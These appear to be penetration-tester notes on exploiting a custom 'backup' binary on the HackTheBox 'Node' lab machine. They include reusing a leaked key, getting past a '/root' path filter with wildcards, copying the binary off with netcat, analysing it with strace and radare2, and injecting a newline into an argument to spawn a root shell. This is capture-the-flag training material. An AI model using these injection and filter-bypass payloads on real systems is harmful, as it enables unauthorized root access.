# binaries

## You found a custom Binary

* What does it do?
* Perhaps a script or job is running it.
* How many options does it take?
* How can you exploit it?
* REF: [BufferOverflow](/06-linux-privesc/buffer-overflow.md), [CharEvasion](/03-getting-in/char-evasion-tricks.md), [PrivEsc](/06-linux-privesc/lx-privesc.md)

## "backup" example

* From nodeHTB, [mongodb](/06-linux-privesc/mongodb-node.md)
* Custom app: **/usr/local/bin/backup**
* Find a script that executes 'backup' and learn from it!

```
grep -Ri backup .               ..find references to 'backup'
find . | grep app.js            ..find our app
cat /var/www/myplace/app.js

const backup_key  = '45fac123...';
app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

backup -q key /dir   ..we learned how to execute!
```

## backup /root

```
----------------
backup -q key /dir                                    ..how to execute!
/usr/local/bin/backup -q 45fac123... /tmp > out.txt   ..works!
base64 -d out.txt > decode-base64                     ..decode
file decode-base64                                    ..zip archive
unzip decode-base64                                   ..unzip

----------------
get root:
/usr/local/bin/backup -q 45fac123... /root > root.txt
base64 -d root.txt > /tmp/root
unzip root         ..failed
7z x rootdecoded   ..kinda worked?
cat root           ..failed
```

## Avoid '/root' Filter with Splatting

* REF: [CharEvasion](/03-getting-in/char-evasion-tricks.md)

```
----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

----------------
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded
```

## Work Local

* Send file to yourself.. You have better analysis tools!

```
nc $MyIP 4444 < /usr/bin/backup   ..send
nc -nlvp 4444 > backup            ..receive

md5sum backup                     ..confirm
chmod +x ./backup
```

## strace

```
strace ./backup                    ..might be interesting
strace ./backup 1 2 3              ..works better with 3 arguments :)

ltrace ..found our app was filtering root and etc
ltrace /usr/local/bin/backup -q secretkey /root/root.txt
```

## Analyze Assembly: radare2

```
> r2 backup
aaa       ..analyze
afl       ..function list
vvv       ..visual mode
sym.main  ..scroll here
g g       ..get details
<space>   ..change view: nice call graph

./backup 1 2 3           ..App needs 3 Arguments!
strace ./backup 1 2 3    ..reads from /etc/myplace/keys
```

## Analyze Assembly: binaryninja

* Better graphics than radare2
* But, doesn't show hex nicely

```
/opt/binaryninja/binaryninja

'main'  ..drill around follow the blacklist and trollface
'push'  ..keywords to watch for

Found redirects: /root $ ` ; | /etc // /
```

## PrivEsc: Newline Character

* <https://joshuasuren.medium.com/hack-the-box-node-write-up-11-b47efb3c98ab>

```
/bin/myapp -q secretkey "xxx
> /bin/bash
> xxx"
# whoami ..root!
```

## PrivEsc: Newline Character printf

* Newline character in printf function can also give you root!

```
------------------
printf 'hi\nNewLine\nBye'  ..gives us new lines

------------------
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')"
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')"
```

